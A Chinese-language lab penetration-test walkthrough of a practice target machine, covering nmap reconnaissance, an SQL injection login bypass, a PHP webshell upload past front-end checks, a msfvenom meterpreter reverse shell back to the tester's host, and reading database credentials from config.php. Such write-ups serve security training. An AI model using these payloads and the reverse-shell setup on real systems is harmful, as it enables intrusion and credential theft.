2.6-3 综合简单 渗透测试报告

靶机登陆后先执行passwd root,修改密码为asd123***

信息收集

arp-scan -l扫一下目标IP

确认了目标IP为192.168.80.162

nmap详细扫描nmap -A 192.168.80.162

看到打开了 21(ftp)、22(ssh)、80(http) 三个端口。

先访问web页面吧http://192.168.80.162/

何意味?

御剑扫一下

看看login.php

随便输入账密提交抓不到包而是直接弹窗,关闭 js 后不弹窗了,说明存在前端检查。

查看源代码发现如下的 js 代码:

可见前端首先对用户名进行了一次判断,用户名必须为:[email protected]的形式表单才会被提交处理

所以我们输入:

1
2
用户名:[email protected]
密码:123' or 1=1#

文件上传

成功登入,发现存在文件上传:

右键查看源代码,同样存在前端的 js 文件基础验证:

常规玩法(webshell)

写一个一句话木马,后缀名为jpg来绕过前端验证,burp抓包修改数据包里的后缀名为php

查看http://192.168.80.162/uploads/已经成功上传并且可以成功执行语句

进阶玩法(msf木马)

使用msf生成免杀的php木马:

1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.80.157 lport=4444 -f raw > hello.php

木马大概长这样:

提前在msf中开启回弹等待

1
2
3
4
5
msfconsole
use exploit/multi/handler
set lhost 192.168.80.157
set payload php/meterpreter/reverse_tcp
run

将刚才的木马上传(方法同上),到http://192.168.80.162/uploads/中访问该木马。

成功拿到meterpreter


提权

1
2
3
shell
cd ../
ls

发现了config.php数据库配置文件

说明数据库账密为root:toor,遂尝试sql连接数据库

先升级美化一下终端:

1
python -c "import pty;pty.spawn('/bin/bash')"

sql连接成功数据库:

1
mysql -uroot -ptoor

手动查表:

1
2
3
4
show databases;
use deneme;
show tables;
select * from user;

使用查到的密码切换至root用户

1
2
su root
密码为:asd123***

不过这个靶场的root目录下没有flag

Licensed under CC BY-NC-SA 4.0
已存在于互联网
发表了126篇文章 · 总计210.25k字
萌ICP备20267077号
Powered by ctOS